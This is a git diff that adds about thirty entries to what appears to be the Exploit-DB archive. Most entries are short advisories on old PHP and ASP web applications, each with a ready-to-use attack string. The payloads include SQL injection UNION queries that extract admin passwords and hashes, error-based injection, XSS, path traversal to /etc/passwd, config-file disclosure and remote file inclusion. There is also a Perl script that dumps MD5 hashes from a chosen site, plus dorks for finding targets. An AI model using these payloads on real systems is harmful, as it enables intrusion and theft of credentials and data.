diff --git a/files.csv b/files.csv index 3557ae6ae..4a2c2e931 100755 --- a/files.csv +++ b/files.csv @@ -27705,6 +27705,7 @@ id,file,description,date,author,platform,type,port 30862,platforms/php/webapps/30862.txt,"E-Xoops 1.0.5/1.0.8 adresses/ratefile.php lid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0 30863,platforms/php/webapps/30863.txt,"E-Xoops 1.0.5/1.0.8 mydownloads/ratefile.php lid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0 30864,platforms/php/webapps/30864.txt,"E-Xoops 1.0.5/1.0.8 mysections/ratefile.php lid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0 +30872,platforms/php/webapps/30872.txt,"DomPHP <= v0.83 - SQL Injection Vulnerability",2014-01-13,Houssamix,php,webapps,0 30873,platforms/php/webapps/30873.txt,"E-Xoops 1.0.5/1.0.8 myalbum/ratephoto.php lid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0 30874,platforms/php/webapps/30874.txt,"E-Xoops 1.0.5/1.0.8 modules/banners/click.php bid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0 30875,platforms/php/webapps/30875.txt,"E-Xoops 1.0.5/1.0.8 modules/arcade/index.php gid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0 @@ -27770,3 +27771,30 @@ id,file,description,date,author,platform,type,port 30940,platforms/asp/webapps/30940.txt,"IPortalX forum/login_user.asp Multiple Parameter XSS",2007-12-27,Doz,asp,webapps,0 30941,platforms/asp/webapps/30941.txt,"IPortalX blogs.asp Date Parameter XSS",2007-12-27,Doz,asp,webapps,0 30942,platforms/linux/dos/30942.c,"Extended Module Player (xmp) 2.5.1 'oxm.c' And 'dtt_load.c' Multiple Local Buffer Overflow Vulnerabilities",2007-12-27,"Luigi Auriemma",linux,dos,0 +30945,platforms/php/webapps/30945.txt,"NetBizCity FaqMasterFlexPlus 'faq.php' Cross-Site Scripting Vulnerability",2007-12-28,"Juan Galiana Lara",php,webapps,0 +30946,platforms/php/webapps/30946.txt,"Collabtive 1.1 (managetimetracker.php, id param) - SQL Injection",2014-01-15,"Yogesh Phadtare",php,webapps,80 +30947,platforms/php/webapps/30947.txt,"NetBizCity FaqMasterFlexPlus 'faq.php' SQL Injection Vulnerability",2007-12-28,"Juan Galiana Lara",php,webapps,0 +30948,platforms/php/webapps/30948.txt,"OpenBiblio 0.x staff_del_confirm.php Multiple Parameter XSS",2007-12-28,"Juan Galiana Lara",php,webapps,0 +30949,platforms/php/webapps/30949.txt,"OpenBiblio 0.x theme_del_confirm.php name Parameter XSS",2007-12-28,"Juan Galiana Lara",php,webapps,0 +30950,platforms/php/webapps/30950.html,"PHPJabbers Pet Listing Script 1.0 - Multiple Vulnerabilities",2014-01-15,"HackXBack ",php,webapps,80 +30951,platforms/php/webapps/30951.html,"OpenBiblio 0.x theme_preview.php themeName Parameter XSS",2007-12-28,"Juan Galiana Lara",php,webapps,0 +30952,platforms/php/webapps/30952.html,"PHPJabbers Property Listing Script 2.0 - Add Admin CSRF Vulnerability",2014-01-15,"HackXBack ",php,webapps,80 +30953,platforms/php/webapps/30953.txt,"PHPJabbers Vacation Packages Listing 2.0 - Multiple Vulnerabilities",2014-01-15,"HackXBack ",php,webapps,80 +30954,platforms/php/webapps/30954.txt,"PHPJabbers Hotel Booking System 3.0 - Multiple Vulnerabilities",2014-01-15,"HackXBack ",php,webapps,80 +30955,platforms/php/webapps/30955.txt,"PHPJabbers Vacation Rental Script 3.0 - Multiple Vulnerabilities",2014-01-15,"HackXBack ",php,webapps,80 +30956,platforms/linux/dos/30956.txt,"CoolPlayer 217 'CPLI_ReadTag_OGG()' Buffer Overflow Vulnerability",2007-12-28,"Luigi Auriemma",linux,dos,0 +30957,platforms/php/webapps/30957.txt,"PHCDownload 1.1 search.php string Parameter SQL Injection",2007-12-29,Lostmon,php,webapps,0 +30958,platforms/php/webapps/30958.txt,"PHCDownload 1.1 search.php string Parameter XSS",2007-12-29,Lostmon,php,webapps,0 +30959,platforms/php/webapps/30959.txt,"Makale Scripti Cross-Site Scripting Vulnerability",2007-12-29,GeFORC3,php,webapps,0 +30960,platforms/php/webapps/30960.pl,"CustomCMS 3.1 'vars.php' SQL Injection Vulnerability",2007-12-29,Pr0metheuS,php,webapps,0 +30961,platforms/php/webapps/30961.txt,"MatPo.de Kontakt Formular 1.4 'function.php' Remote File Include Vulnerability",2007-12-30,bd0rk,php,webapps,0 +30962,platforms/php/webapps/30962.txt,"MilliScripts 'dir.php' Cross-Site Scripting Vulnerability",2007-12-31,"Jose Luis Gangora Fernandez",php,webapps,0 +30963,platforms/asp/webapps/30963.txt,"InstantSoftwares Dating Site Login SQL Injection Vulnerability",2007-12-31,"Aria-Security Team",asp,webapps,0 +30964,platforms/php/webapps/30964.txt,"LiveCart 1.0.1 user/remindPassword return Parameter XSS",2007-12-31,Doz,php,webapps,0 +30965,platforms/php/webapps/30965.txt,"LiveCart 1.0.1 category q Parameter XSS",2007-12-31,Doz,php,webapps,0 +30966,platforms/php/webapps/30966.txt,"LiveCart 1.0.1 order return Parameter XSS",2007-12-31,Doz,php,webapps,0 +30967,platforms/php/webapps/30967.txt,"LiveCart 1.0.1 user/remindComplete email Parameter XSS",2007-12-31,Doz,php,webapps,0 +30968,platforms/php/webapps/30968.txt,"MODx 0.9.6.1 'htcmime.php' Source Code Information Disclosure Vulnerability",2008-01-02,"AmnPardaz Security Research Team",php,webapps,0 +30969,platforms/php/webapps/30969.txt,"MODx 0.9.6.1 'AjaxSearch.php' Local File Include Vulnerability",2008-01-02,"AmnPardaz Security Research Team",php,webapps,0 +30972,platforms/multiple/remote/30972.txt,"Camtasia Studio 4.0.2 'csPreloader' Remote Code Execution Vulnerability",2008-01-02,"Rich Cannings",multiple,remote,0 +30973,platforms/multiple/remote/30973.txt,"InfoSoft FusionCharts 3 SWF Flash File Remote Code Execution Vulnerability",2008-01-02,"Rich Cannings",multiple,remote,0 diff --git a/platforms/asp/webapps/30963.txt b/platforms/asp/webapps/30963.txt new file mode 100755 index 000000000..a54047458 --- /dev/null +++ b/platforms/asp/webapps/30963.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/27080/info + +InstantSoftwares Dating Site is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +The following proof of concept is available: + +Username: Admin +Password: anything' OR 'x'='x \ No newline at end of file diff --git a/platforms/linux/dos/30956.txt b/platforms/linux/dos/30956.txt new file mode 100755 index 000000000..f9126bd75 --- /dev/null +++ b/platforms/linux/dos/30956.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/27061/info + +CoolPlayer is prone a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. + +The issue occurs when handling specially crafted OGG files. + +Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application. Failed exploit attempts likely result in denial-of-service conditions. + +CoolPlayer 217 is vulnerable; other versions may also be affected. + +vorbiscomment -t cTag=AAA_2500_A's_AAA -a input.ogg output.ogg \ No newline at end of file diff --git a/platforms/multiple/remote/30972.txt b/platforms/multiple/remote/30972.txt new file mode 100755 index 000000000..71f746fc9 --- /dev/null +++ b/platforms/multiple/remote/30972.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/27107/info + +Camtasia Studio is prone to a remote code-execution vulnerability because the application fails to properly sanitize user-supplied input. + +A successful exploit will allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +NOTE: This vulnerability was initially considered a cross-site scripting issue, but further analysis reveals that this is a remote code-execution vulnerability. + +http://www.example.com/Example_controller.swf?csPreloader=http://www.example2.com/DoKnowEvil.swf%3f \ No newline at end of file diff --git a/platforms/multiple/remote/30973.txt b/platforms/multiple/remote/30973.txt new file mode 100755 index 000000000..1453cf534 --- /dev/null +++ b/platforms/multiple/remote/30973.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/27109/info + +InfoSoft FusionCharts is prone to a remote code-execution vulnerability because the application fails to properly sanitize user-supplied input. + +An attacker can exploit this issue to execute malicious script code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible. + +http://www.example.com/Example.swf?debugMode=1&dataURL=%27%3E%3Cimg+src%3D%22http%3A//www.example2.com/DoKnowEvil.swf%3F.jpg%22%3E \ No newline at end of file diff --git a/platforms/php/webapps/30872.txt b/platforms/php/webapps/30872.txt new file mode 100755 index 000000000..a6114ec34 --- /dev/null +++ b/platforms/php/webapps/30872.txt @@ -0,0 +1,20 @@ +------------------------------------------------------------- +DomPHP <= v0.83 SQL Injection Vulnerability +------------------------------------------------------------- + += Author : Houssamix += Script : DomPHP <= v0.83 + += Download : http://www.domphp.com/download/ + += BUG : SQL Injection Vulnerability + += DORK : Site créé à l'aide du CMS DomPHP v0.83 + += Exploit : +http://[target]/agenda/indexdate.php?ids=77 [SQL] + +Exemple : + +http://site.com/domphp/agenda/indexdate.php?ids=77 UNION SELECT 1,2,3,loginUtilisateur,5,6,passUtilisateur,8,9,10,11,12,13,14,15 from domphp_utilisateurs-- + diff --git a/platforms/php/webapps/30912.txt b/platforms/php/webapps/30912.txt index c6a6f56b1..09eeb773d 100755 --- a/platforms/php/webapps/30912.txt +++ b/platforms/php/webapps/30912.txt @@ -6,8 +6,6 @@ Car Rental Script - Multiple Vulnerabilities .:. Contact : h-b@usa.com .:. Home : http://www.iphobos.com/blog/ .:. Script : http://www.phpjabbers.com/car-rental/ -.:. Tested On Demo : -http://www.phpjabbers.com/demo/cr_11/index.php?controller=Admin&action=login #################################################################### ===[ Exploit ]=== diff --git a/platforms/php/webapps/30945.txt b/platforms/php/webapps/30945.txt new file mode 100755 index 000000000..d02abb7e5 --- /dev/null +++ b/platforms/php/webapps/30945.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/27051/info + +FaqMasterFlexPlus is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +All versions of FaqMasterFlexPlus are considered vulnerable. + +http://www.example.com/[path/to/faq/]/faq.php?category_id=1&cat_name=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/30946.txt b/platforms/php/webapps/30946.txt new file mode 100755 index 000000000..f5d580c71 --- /dev/null +++ b/platforms/php/webapps/30946.txt @@ -0,0 +1,79 @@ +##=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+## +|| || +|| Advisory : Collabtive Sql Injection || +|| Affected Version : 1.1 || +|| Vendor : http://collabtive.o-dyn.de/index.php || +|| Risk : Medium || +|| CVE-ID : 2013-6872 || +|| Tested on Platform : Windows 7 || +##=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+## + +========================================================================================================== + +Product Description: + + +Collabtive is web-based project management software. +The project was started in November 2007. It is open source software and provides an alternative to proprietary tools like Basecamp. Collabtive is written in PHP and JavaScript. + +Collabtive is intended for small to medium-sized businesses and freelancers. We offer commercial services for installation and customization of Collabtive. +It can also be installed on an internal server as well as in the cloud. All major browsers like Internet Explorer, Firefox, Chrome and Safari are supported. + +Collabtive is developed by a team of professional volunteers. Everyone involved is a pro in their respective areas, providing high quality contributions to the project. + +(from product home page) + +Collabtive has more than 1000 downloads per week. +========================================================================================================== + +Vulnerability Description: + +Double query type of SQL Injection vulnerability has been detected in Collabtive web applivation. Application failed to sanitize user supplied input in parameter "id" of page managetimetracker.php. + +User must be authenticated to exploit this vulnerability. + +This vulnerability was tested with Collabtive 1.1. Other versions may also be affected. + +=========================================================================================================== + +Impact: + +Successful exploitation of this vulnerability will allow a remote authenticated attacker to extract sensitive and confidential data from the database. + +=========================================================================================================== + +Proof of Concept: + +URL: http://www.example.com/collabtive/managetimetracker.php?action=projectpdf&id=2 + +PAYLOAD: and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 + +Example: + +Following query will show name of first database in error. + +http://www.example.com/collabtive/managetimetracker.php?action=projectpdf&id=2 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 + +=========================================================================================================== + +Solution: + +There's no known workaround available. + +This vulnerability has been fixed in version 1.2 of Collabtive. + +=========================================================================================================== + +Disclosure Timeline: +~Vendor notification: 26th November 2013 +~Vendor response: 27th November 2013 +~Vendor released updates: 4th January 2014 +~Public disclosure: 15th January 2014 +=========================================================================================================== + +Advisory discovered by: Yogesh Phadtare + Secur-I Research Group + http://securview.com/ + + + diff --git a/platforms/php/webapps/30947.txt b/platforms/php/webapps/30947.txt new file mode 100755 index 000000000..b617d873b --- /dev/null +++ b/platforms/php/webapps/30947.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/27052/info + +FaqMasterFlexPlus is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +All versions of FaqMasterFlexPlus are considered vulnerable. + +http://www.example.com/[path/to/faq]/faq.php?category_id=1'%20union%20select%201,1,user(),1/* +http://www.example.com/[path/to/faq]/faq.php?category_id=1'%20union%20select%201,1,passwrd,1%20from%20users%20where%20userid='admin \ No newline at end of file diff --git a/platforms/php/webapps/30948.txt b/platforms/php/webapps/30948.txt new file mode 100755 index 000000000..7e8ef6ef6 --- /dev/null +++ b/platforms/php/webapps/30948.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/27053/info + +OpenBiblio is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. The issues include SQL-injection, cross-site scripting, HTML-injection, and local file-include vulnerabilities. + +Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, execute arbitrary local scripts, retrieve potentially sensitive information, or exploit latent vulnerabilities in the underlying database. + +These issues affect Openbiblio 0.5.2-pre4 and prior versions. + +http://www.example.com/openbiblio/admin/staff_del_confirm.php?UID=1&LAST=[XSS]&FIRST=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/30949.txt b/platforms/php/webapps/30949.txt new file mode 100755 index 000000000..a2608803c --- /dev/null +++ b/platforms/php/webapps/30949.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/27053/info + +OpenBiblio is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. The issues include SQL-injection, cross-site scripting, HTML-injection, and local file-include vulnerabilities. + +Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, execute arbitrary local scripts, retrieve potentially sensitive information, or exploit latent vulnerabilities in the underlying database. + +These issues affect Openbiblio 0.5.2-pre4 and prior versions. + +http://www.example.com/openbiblio/admin/theme_del_confirm.php?themeid=6&name=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/30950.html b/platforms/php/webapps/30950.html new file mode 100755 index 000000000..bf87f3e2c --- /dev/null +++ b/platforms/php/webapps/30950.html @@ -0,0 +1,75 @@ +Pet Listing Script V1.0 - Multiple Vulnerabilities +==================================================================== + +#################################################################### +.:. Author : HackXBack +.:. Contact : h-b@usa.com +.:. Home : http://www.iphobos.com/blog/ +.:. Script : http://www.phpjabbers.com/pet-listing-script/ +#################################################################### + +===[ Exploit ]=== + +[1] Cross Site Request Forgery +============================== + +[Add Admin] + + + +
+ + + + + +
+ + + +[2] Multiple Cross Site Scripting +================================== + +# CSRF with XSS Exploit: + +I. Xss In Type + + + +
+ + +
+ + + +II. Xss In Breed + + + +
+ + + +
+ + + +III. Xss In Extra + + + +
+ + +
+ + +#################################################################### diff --git a/platforms/php/webapps/30951.html b/platforms/php/webapps/30951.html new file mode 100755 index 000000000..3920ed358 --- /dev/null +++ b/platforms/php/webapps/30951.html @@ -0,0 +1,13 @@ +source: http://www.securityfocus.com/bid/27053/info + +OpenBiblio is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. The issues include SQL-injection, cross-site scripting, HTML-injection, and local file-include vulnerabilities. + +Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, execute arbitrary local scripts, retrieve potentially sensitive information, or exploit latent vulnerabilities in the underlying database. + +These issues affect Openbiblio 0.5.2-pre4 and prior versions. + +
+

+ +
diff --git a/platforms/php/webapps/30952.html b/platforms/php/webapps/30952.html new file mode 100755 index 000000000..4446ea8e3 --- /dev/null +++ b/platforms/php/webapps/30952.html @@ -0,0 +1,34 @@ +Property Listing Script V2.0 - Add Admin CSRF Vulnerability +==================================================================== + +#################################################################### +.:. Author : HackXBack +.:. Contact : h-b@usa.com +.:. Home : http://www.iphobos.com/blog/ +.:. Script : http://www.phpjabbers.com/property-listing-script/ +#################################################################### + +===[ Exploit ]=== + +Cross Site Request Forgery +========================== + +[Add Admin] + + + +
+ + + + + + + +
+ + + +#################################################################### diff --git a/platforms/php/webapps/30953.txt b/platforms/php/webapps/30953.txt new file mode 100755 index 000000000..0c5b717e7 --- /dev/null +++ b/platforms/php/webapps/30953.txt @@ -0,0 +1,93 @@ +Vacation Packages Listing V2.0 - Multiple Vulnerabilities +==================================================================== + +#################################################################### +.:. Author : HackXBack +.:. Contact : h-b@usa.com +.:. Home : http://www.iphobos.com/blog/ +.:. Script : http://www.phpjabbers.com/vacation-packages/ +#################################################################### + +===[ Exploit ]=== + +[1] Cross Site Request Forgery +============================== + +[Add Admin] + + + +
+ + + + + + + + + + + + +
+ + + +[2] Multiple Cross Site Scripting +================================== + +# CSRF with XSS Exploit: + +I. Xss In Types + + + +
+ + + + +
+ + + +II. Xss In Features + + + +
+ + + + +
+ + + +III. Xss In Countries + + + +
+ + + + +
+ + + +[3] Local File disclure +======================== + +http://site/index.php?controller=pjBackup&action=pjActionDownload&id=../../../../../../../../etc/passwd + +#################################################################### diff --git a/platforms/php/webapps/30954.txt b/platforms/php/webapps/30954.txt new file mode 100755 index 000000000..9aa9c3794 --- /dev/null +++ b/platforms/php/webapps/30954.txt @@ -0,0 +1,63 @@ +Hotel Booking System V3.0 - Multiple Vulnerabilties +==================================================================== + +#################################################################### +.:. Author : HackXBack +.:. Contact : h-b@usa.com +.:. Home : http://www.iphobos.com/blog/ +.:. Script : http://www.phpjabbers.com/hotels-booking-system/ +#################################################################### + +===[ Exploit ]=== + +[1] Cross Site Request Forgery +============================== + +[Add Admin] + + + +
+ + + + + + +
+ + + +
+ + + + + + + + + + +
+ + + + +[3] Local File disclure +======================== + +http://site/index.php?controller=pjBackup&action=pjActionDownload&id=../../../../../../../../etc/passwd + +#################################################################### diff --git a/platforms/php/webapps/30955.txt b/platforms/php/webapps/30955.txt new file mode 100755 index 000000000..b159b94bd --- /dev/null +++ b/platforms/php/webapps/30955.txt @@ -0,0 +1,89 @@ +Vacation Rental Script V3.0 - Multiple Vulnerabilties +==================================================================== + +#################################################################### +.:. Author : HackXBack +.:. Contact : h-b@usa.com +.:. Home : http://www.iphobos.com/blog/ +.:. Script : http://www.phpjabbers.com/vacation-rental-script/ +#################################################################### + +===[ Exploit ]=== + +[1] Cross Site Request Forgery +============================== + +[Add Admin] + + + +
+ + + + + + + +
+ + + +[2] Multiple Cross Site Scripting +================================== + +# CSRF with XSS Exploit: + +I. Xss In Types + + + +
+ + + + +
+ + + +II. Xss In Features + + + +
+ + + + +
+ + + +III. Xss In Countries + + + +
+ + + + +
+ + + + +[3] Local File disclure +======================== + +http://site/index.php?controller=pjBackup&action=pjActionDownload&id=../../../../../../../../etc/passwd + +#################################################################### diff --git a/platforms/php/webapps/30957.txt b/platforms/php/webapps/30957.txt new file mode 100755 index 000000000..30690466b --- /dev/null +++ b/platforms/php/webapps/30957.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/27066/info + +PHCDownload is prone to an SQL-injection and cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Attackers may also exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +PHCDownload 1.1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/[phcdownload/search.php?string=' \ No newline at end of file diff --git a/platforms/php/webapps/30958.txt b/platforms/php/webapps/30958.txt new file mode 100755 index 000000000..1d412bfab --- /dev/null +++ b/platforms/php/webapps/30958.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/27066/info + +PHCDownload is prone to an SQL-injection and cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Attackers may also exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +PHCDownload 1.1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/[phcdownload/search.php?string=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/30959.txt b/platforms/php/webapps/30959.txt new file mode 100755 index 000000000..481d42adc --- /dev/null +++ b/platforms/php/webapps/30959.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/27067/info + +Makale Scripti is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +http://site.com/script_path/Ara/?ara= "> \ No newline at end of file diff --git a/platforms/php/webapps/30960.pl b/platforms/php/webapps/30960.pl new file mode 100755 index 000000000..335241ee0 --- /dev/null +++ b/platforms/php/webapps/30960.pl @@ -0,0 +1,64 @@ +source: http://www.securityfocus.com/bid/27069/info + +CustomCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +CustomCMS 3.1 is vulnerable to this issue; other versions may also be affected. + +#!/usr/bin/perl +#Found by Pr0metheuS +#Coded by Pr0metheuS +#Gr33tz-Team +#Dork : intitle:"CCMS v3.1 Demo PW" +print "______________________________________\n"; +print "-=-=-=-=-=-=+-=-=-=-=-=-=-+-=-=-=-=-=|\n"; +print "-=-=-=-=-=-=+CCMS Exploit...+-=-=-=-=|\n"; +print "-=-=-=-=-=-=+Remote MD5 Hash+-=-=-=-=|\n"; +print "-=-=-=-=-=-=+By Pr0metheus..+-=-=-=-=|\n"; +print "-=-=-=-=-=-=+Gr33tz to :+-=-=-=-=|\n"; +print "-=-=-=-=-=-=+pawel2827, d3d!k, J4Z0, chez, fir3+-=-=-=-=|\n"; +print "______________________________________\n"; +print "[+] Enter SITE:\n"; +$SITE = ; +chomp $SITE; +print "[+] Enter PATH:\n"; +$PATH = ; +chomp $PATH; +print "[+] Enter USERID:\n"; +$USERID = ; +chomp $USERID; +print "______________________________________\n"; +#Send Request +use LWP::UserAgent; +$ua = new LWP::UserAgent; +$ua->agent("Mozilla/8.0"); +$ua = LWP::UserAgent->new; +my $req = HTTP::Request->new(GET => "$SITE$PATH/admin.php/vars.php?page=Console&p=1'+union+select+userid,2,3,PASSWORD+from+user+where+userid=$USERID/*"); +$req->header('Accept' => 'text/html'); +$res = $ua->request($req); +$con = $res->content; +#FIND MD5 IN TEXT REGEX !!! +if ($con =~ "/([0-9a-fA-F]{32})/") { +print "______________________________________\n"; +print "-=-=-=-=-=-=+-=-=-=-=-=-=-+-=-=-=-=-=|\n"; +print "-=-=-=-=-=-=+CCMS Exploit...+-=-=-=-=|\n"; +print "-=-=-=-=-=-=+Remote MD5 Hash+-=-=-=-=|\n"; +print "-=-=-=-=-=-=+By Pr0metheus..+-=-=-=-=|\n"; +print "-=-=-=-=-=-=+Gr33tz to :+-=-=-=-=|\n"; +print "-=-=-=-=-=-=+pawel2827, d3d!k, J4Z0, chez, fir3+-=-=-=-=|\n"; +print "[+] Exploit successful!\n"; +print "[+] USERID:$USERID\n"; +print "[+] MD5:$1\n"; +print "______________________________________\n"; +} +else{ +print "______________________________________\n"; +print "-=-=-=-=-=-=+-=-=-=-=-=-=-+-=-=-=-=-=|\n"; +print "-=-=-=-=-=-=+CCMS Exploit...+-=-=-=-=|\n"; +print "-=-=-=-=-=-=+Remote MD5 Hash+-=-=-=-=|\n"; +print "-=-=-=-=-=-=+By Pr0metheus..+-=-=-=-=|\n"; +print "-=-=-=-=-=-=+Gr33tz to :+-=-=-=-=|\n"; +print "-=-=-=-=-=-=+pawel2827, d3d!k, J4Z0, chez, fir3+-=-=-=-=|\n"; + print "[+] Exploit Failed!\n"; +} diff --git a/platforms/php/webapps/30961.txt b/platforms/php/webapps/30961.txt new file mode 100755 index 000000000..75002d493 --- /dev/null +++ b/platforms/php/webapps/30961.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/27075/info + +Kontakt Formular is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. + +Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +This issue affects Kontakt Formular 1.4; other versions may be vulnerable as well. + +http://www.example.com/[path]/includes/function.php?root_path=[Shellcode] \ No newline at end of file diff --git a/platforms/php/webapps/30962.txt b/platforms/php/webapps/30962.txt new file mode 100755 index 000000000..dea2e67a6 --- /dev/null +++ b/platforms/php/webapps/30962.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/27078/info + +MilliScripts is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +http://www.example.com/PATH/dir.php?do=browse&cat=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/30964.txt b/platforms/php/webapps/30964.txt new file mode 100755 index 000000000..842b8796d --- /dev/null +++ b/platforms/php/webapps/30964.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/27087/info + +LiveCart is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +LiveCart 1.0.1 is vulnerable to these issues; other versions may also be affected. + +http://www.example.com/user/remindPassword?return=XSS \ No newline at end of file diff --git a/platforms/php/webapps/30965.txt b/platforms/php/webapps/30965.txt new file mode 100755 index 000000000..95dca522e --- /dev/null +++ b/platforms/php/webapps/30965.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/27087/info + +LiveCart is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +LiveCart 1.0.1 is vulnerable to these issues; other versions may also be affected. + +http://www.example.com/category?id=1&q=XSS \ No newline at end of file diff --git a/platforms/php/webapps/30966.txt b/platforms/php/webapps/30966.txt new file mode 100755 index 000000000..4868b6d76 --- /dev/null +++ b/platforms/php/webapps/30966.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/27087/info + +LiveCart is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +LiveCart 1.0.1 is vulnerable to these issues; other versions may also be affected. + +http://www.example.com/order?return=order/XSS \ No newline at end of file diff --git a/platforms/php/webapps/30967.txt b/platforms/php/webapps/30967.txt new file mode 100755 index 000000000..631ec651d --- /dev/null +++ b/platforms/php/webapps/30967.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/27087/info + +LiveCart is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +LiveCart 1.0.1 is vulnerable to these issues; other versions may also be affected. + +http://www.example.com/user/remindComplete?email=XSS \ No newline at end of file diff --git a/platforms/php/webapps/30968.txt b/platforms/php/webapps/30968.txt new file mode 100755 index 000000000..ffe4a1864 --- /dev/null +++ b/platforms/php/webapps/30968.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/27096/info + +MODx is prone to a vulnerability that allows attackers to access source code because the application fails to properly sanitize user-supplied input. + +An attacker can exploit this vulnerability to retrieve arbitrary files from the vulnerable system in the context of the webserver process. Information obtained may aid in further attacks. + +MODx 0.9.6.1 is vulnerable; other versions may also be affected. + +http://www.example.com/modx-0.9.6.1/assets/js/htcmime.php?file=../../manager/includes/config.inc.php%00.htc \ No newline at end of file diff --git a/platforms/php/webapps/30969.txt b/platforms/php/webapps/30969.txt new file mode 100755 index 000000000..b0441b881 --- /dev/null +++ b/platforms/php/webapps/30969.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/27097/info + +MODx is prone to a local file-include vulnerability 